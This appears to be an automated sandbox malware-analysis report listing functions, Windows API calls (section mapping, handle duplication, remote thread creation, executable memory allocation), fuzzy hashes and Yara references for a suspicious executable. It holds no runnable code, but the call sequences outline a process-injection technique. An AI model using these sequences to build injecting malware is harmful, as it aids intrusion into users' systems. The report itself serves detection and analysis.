API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69

Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65

Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24

Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64

Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64

Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64

Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64

Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040311D
NtTerminateProcess.NTDLL ref: 00403136

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5

Function 00417D6F Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 214
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,00000000), ref: 00417E02
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417E10
WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417E27
lstrcpynW.KERNEL32(?,00000000,00000000), ref: 00417E36
GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00417E3F
SetFileApisToANSI.KERNEL32 ref: 00417E45
SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417E4D
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00417E5C
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00417E65
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00417E9D
AddAtomA.KERNEL32(00000000), ref: 00417EA4
GetCommProperties.KERNELBASE(00000000,?), ref: 00417EB2
SetLastError.KERNEL32(00000000), ref: 00417EB9
GetProcessDefaultLayout.USER32(00000000), ref: 00417EC8
ReleaseActCtx.KERNEL32(00000000), ref: 00417EDB
GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 00417EEA
FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00417F06
SetConsoleTitleA.KERNEL32(00000000), ref: 00417F4A
LocalFree.KERNEL32(00000000), ref: 00417F51
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417F68
LoadLibraryA.KERNELBASE(0041A448), ref: 00417FEC

Strings

k`, xrefs: 00418000
tl_, xrefs: 00417DE3
}$, xrefs: 0041800D

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: Console$AliasesAtomFileName$AllocApisCommDateDefaultEnumErrorExchangeFoldFormatsFreeGlobalInterlockedLastLayoutLengthLibraryLoadLocalModuleMountPointProcessPropertiesReleaseStringTitleVolumeWritelstrcatlstrcpyn
String ID: k`$tl_$}$
API String ID: 2707108674-211918992
Opcode ID: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
Instruction ID: ddf06cef7b4f2340048b7641273970f77a1e110b5080587248a091a61e489f39
Opcode Fuzzy Hash: 5247a80322c137a15aa0b1bfea1bb19969df6e1595c2137d50653716045b0f87
Instruction Fuzzy Hash: FE61AE71506124ABD725AB66EC58DEF3F7CFF0A355B10417AF205D2121CB388A82CBAD

Function 0067003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D

Strings

cess, xrefs: 0067018D
kernel32.dll, xrefs: 0067008F, 00670095

Memory Dump Source

Source File: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_670000_ftejced.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

Function 0050FDB1 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0050FDD9
Module32First.KERNEL32(00000000,00000224), ref: 0050FDF9

Memory Dump Source

Source File: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50d000_ftejced.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 4d8003d6bb17ca19460313de374bf89ad96b673ba7111da5dc0f1f277a61f756
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BDF06D32200711ABD7302AB9A88DBAE7AECBF49725F100539F646918C1DBB0EC454BA1

Function 00670E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E

Memory Dump Source

Source File: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_670000_ftejced.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 00417B14 Relevance: 1.5, APIs: 1, Instructions: 11
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,?), ref: 00417B2A

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
Instruction ID: ba6cbb3cd07b257a8cb762b1762eaf264e462e583e55377f58ee2727f3315d2d
Opcode Fuzzy Hash: bef717294446de930566c56004e6725fcd1278c60b61f264854cca6fbe4bfdb3
Instruction Fuzzy Hash: 9BC08C7520020ABFCB018B82FC01E863B6CE308284F004271F702A00B0C2B1E900AB1C

Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F

Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F

Function 0050FA70 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0050FAC1

Memory Dump Source

Source File: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50d000_ftejced.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b6e064d7d5a16856d920f7a2f464be9e2676c26c53f4bfa419b841481368a2b3
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: C1112B79A00208FFDB01DF98C989E98BFF5AF08751F1580A4F9489B362D771EA50DB80

Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F

Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F

Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401966

Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645

Memory Dump Source

Source File: 00000010.00000002.1779955842.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_ftejced.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

Function 00417AF3 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
Instruction ID: 11052f0533907eac1b5ead624f86bd19dd77f4dadc222b17fd93c0952cc8d916
Opcode Fuzzy Hash: 0978ef2af6f889954126f1639b5d39f7fcb4e9f6f80359241490d42005375475
Instruction Fuzzy Hash: DDB092B08083059FEB404F269C093593A20F704272F18877AED28882E5EBA08A40AF25

Function 00417AF5 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00417F99), ref: 00417AFD

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
Instruction ID: cd47c4b9bc37ffacf91a7bbe6c6ae0b538b313659090cfa5301434a9e3d42730
Opcode Fuzzy Hash: 82d2b05aa270e2ebe1c3121fb221fe189987ee2b6f2f6f9fdafd653cff0eabde
Instruction Fuzzy Hash: 77B012B44002008FC7400F50AC14B413E20E30C343F008334E60444170C7704100BF19

Non-executed Functions

Function 00417C78 Relevance: 6.0, APIs: 4, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00417C8F
OpenJobObjectW.KERNEL32(00000000,00000000,00000000), ref: 00417CAC
BuildCommDCBW.KERNEL32(00000000,?), ref: 00417CB7
LoadLibraryA.KERNEL32(00000000), ref: 00417CBE

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: Object$BuildCommCreateLibraryLoadOpen
String ID:
API String ID: 2043902199-0
Opcode ID: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
Instruction ID: ff2d894db08d9522882be8ab69f88837e2f2e12f0baac11470308de566c9cd02
Opcode Fuzzy Hash: 31cceed8ed1ed4da9f0d8d6c08b2eb6b474c8c2503fdc1db59d39d211b27b345
Instruction Fuzzy Hash: A5E06D31402124EB8B106F25ED1CCCB7FBCEF0A355B008224F50191161E3384A41CFED

Function 00417B32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004B1090), ref: 00417BFE
GetProcAddress.KERNEL32(00000000,0041E260), ref: 00417C3B

Strings

, xrefs: 00417B84

Memory Dump Source

Source File: 00000010.00000002.1779981912.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_40b000_ftejced.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
Instruction ID: 842860c07696174ee3ee74213301e8bfe93044c7bdd6e35420a9822fc7fd421d
Opcode Fuzzy Hash: ed2083ff09e95ea6850085758e8778e50b5988604f5a41a0041129fa4c538e93
Instruction Fuzzy Hash: DC31822955C3C0D9F30197A9BC367A13BA99B15B44F5446BADE448B2B1D3F60584C32E

Analysis Process: IXDaI.exePID: 7708, Parent PID: 1240COMMON

Execution Graph

Execution Coverage:	26.3%
Dynamic/Decrypted Code Coverage:	6.6%
Signature Coverage:	0%
Total number of Nodes:	288
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

